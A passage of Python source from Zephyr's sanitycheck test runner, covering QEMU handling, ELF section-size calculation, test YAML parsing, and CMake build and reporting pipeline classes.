self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
#sometimes QEMU can't handle SIGTERM signal correctly
#in that case kill -9 QEMU process directly and leave
#sanitycheck judge testing result by console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan",
"bt_l2cap_br_fixec_chan",
"bt_gatt_service_static",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
